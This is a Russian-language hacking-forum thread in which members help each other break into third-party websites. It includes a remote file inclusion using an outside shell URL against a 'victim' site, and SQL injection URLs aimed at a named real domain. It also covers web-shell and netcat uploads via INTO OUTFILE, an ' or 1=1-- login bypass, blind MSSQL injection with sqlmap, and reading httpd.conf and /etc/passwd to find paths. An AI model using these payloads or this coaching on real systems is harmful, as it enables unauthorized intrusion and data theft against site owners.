Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    PHP Version 5.1.6
    да, вывело
     
  2. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    140
    Likes Received:
    40
    Reputations:
    26
    ну вот, дальше уже сам =)
     
  3. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php
     
    #23243 korih, 1 May 2014
    Last edited: 1 May 2014
  4. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    51
    Likes Received:
    13
    Reputations:
    10
    Предложи ему такую ссылку:
    http://elitehacker.ru/shell.txt?

    (с вопросом на конце)

    есле помог жми +
     
  5. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    не видит. этот сайт не видет даже в браузере) но за попытку спасибо
     
  6. korih

    korih New Member

    Joined:
    6 Nov 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    пошло-поехало! ура! действительно, всё что надо было, это поставить в конце "?". спасибо большое Ganz Euler)
     
  7. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
    Слепая ли это и как раскрутить правильно...
    http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
    спасибо...
     
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    title смотрите.
     
    1 person likes this.
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,version(),6--

    Все выводит.
     
    _________________________
    1 person likes this.
  10. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    586
    Likes Received:
    15
    Reputations:
    -4
    Добрый день! Подскажите пожалуйста, по заливке шелла

    Заливаю файл через phpmyadmin под пользователем root. File_priv=Y Grant_priv=Y
    Знаю полный путь до сайта через phpinfo, и знаю точные папки доступные под запись.
    В /tmp заливается без проблем файл и считывается тоже.

    Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
     
    #23250 Evil_Genius, 8 May 2014
    Last edited: 8 May 2014
  11. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
     
  12. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    586
    Likes Received:
    15
    Reputations:
    -4
    Да действительно, сейчас залился через админку netcat. Права на сайт полные, но юзер какраз другой. Видимо из-за этого и не заливалось((
     
  13. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    95
    Likes Received:
    16
    Reputations:
    0
    Задача: нужно сдампить 3 колонки с помощью sqlmap
    column1 - int
    column2,3 - varchar

    Но почему то дампится только одна колонка
    По отдельности, все нормально. В чем может быть причина?
    Синтаксически запрос составляю верно
     
  14. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    247
    Likes Received:
    55
    Reputations:
    34
    Привет, прошу помощи:
    Есть asp сайт, при помощи ' or 1=1-- в поле пассворд можно залогинится под юзером, я так полагаю под 1 юзером в бд, но это не админ.
    Как-то можно раскрутить это?
    PHP:
    Microsoft VBScript runtime error '800a000d'  Type mismatch'Cint' 
    вот еще, помогите пожалуйста, а то не знал, не знал да и забыл все в скулях

    UPDATE
    PHP:
    Microsoft OLE DB Provider for SQL Server error '80040e14'  Unclosed quotation mark after the character string '8''. 
    при .asp?itemkey=12345678' проблема в том что стоит фильтир, если неравно 9 символом, то выскакивает еррор пейдж, есть ли возможность обойти?///


    UPD
    есть blind MSsql inj, подкиньте маны, а то гугл не помогает

    //
    karoche mana est'
    теперь нужен софт для раскрутки blind MSSQL injection, или кто гуру - какие параметры кормить sqlmap?
    иньекция в поле пассворд, логика
    PHP:
    password '' or {MY STATEMENT HERE}
    как-то так
    ПС
    походу надо писать софт, ибо если руками перебирать то можно в психушку попасть :mad:

    АПДЕЙТ
    Я еще не в психушке, хорошый мануал по ms sql _ttp://www.exploit-db.com/papers/12975/
     
    #23254 wkar, 12 May 2014
    Last edited: 13 May 2014
  15. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    561
    Likes Received:
    159
    Reputations:
    324
    Может ли быть xss в ответе аякса если не фильтруются < и > ?

    пробовал добавлять html / body head и т.п.
    ничего не выходило
     
  16. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    577
    Likes Received:
    49
    Reputations:
    54
    Вероятно, сервер отдает Content-Type: text/*
    Поведение разных версий браузеров может варьироваться.
     
  17. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    72
    Likes Received:
    8
    Reputations:
    1
    Условия:
    1. File_priv: Y
    2. Возможно читать файлы
    3. Возможное раскрытие путей через Wordpress
    4. Заливка файла через INTO OUTFILE - возможна.
    Всё-бы нечего, НО:

    Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.

    Но я не отчаивался, т.к. File_priv: Y.
    Всё вроде бы ничего и даже получил раскрытие путей, однако:
    Уже это насторожило, т.к. сам блог находится по адресу site.com/blog/, но я не сдавался и шел по избранному мною пути:

    1. :mad::mad::mad:
    Супервозмущение :mad::mad::mad::mad:
    Но я не отчаивался и шёл!

    Дошёл до
    2. :)
    И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой :mad:
    Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)
    Если подставлять вместо опасного запроса, запрос вида: into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.

    Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по /etc/httpd/conf/httpd.conf ).
    Нашёл в нём: DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21 :(:(:(

    Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? :eek: Кстати, нет-нет, но закачал файл в /tmp/ . Результат :)
     
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    1)поищи phpinfo
    2)/home/httpd/html/site/shared - сюда пробовал заливатся?
    3)прочитай htaccess посмотри как настоено
    4)прочитай etc/passwd
    5) попробуй другие пути,
    /var/www/html/domain/
    /var/www/html/site/domain/

    и тд, вариантов уйма, ты сдался ничего не сделав
     
  19. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    72
    Likes Received:
    8
    Reputations:
    1
    1. Искал phpinfo, даже пытался его выводить через concat(0x3c3f20706870696e666f28293b203e) . Нет результата.

    2. Да. Пробовал. Также пробовал все возможности /home/httpd/html/public_html/ , все варианты через /home/httpd/html/папка/ - выдаёт Errcode: 21. Если /home/httpd/html/папка/сайтилипапка/file - Errcode: 2

    3. Корневой хтач? Как я его прочту если не знаю пути :/ По пути через ошибку WP - /home/httpd/html/site/shared/wp/live/wp-content/.htaccess , /home/httpd/html/site/shared/wp/live/.htaccess , /home/httpd/html/site/shared/wp/.htaccess , /home/httpd/html/site/shared/.htaccess, /home/httpd/html/site/.htaccess . Толку нету :mad:

    4. Пробовал другие варианты. Результат, как я говорил выше - Errcode: 2, Errcode: 21, Errcode: 13 :rolleyes:
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    это сильно, напомнил кое кого..

    ты уверен что сайт и база на одном серваке? пробовал читать какой нить файл?
     
    _________________________
Loading...
Thread Status:
Not open for further replies.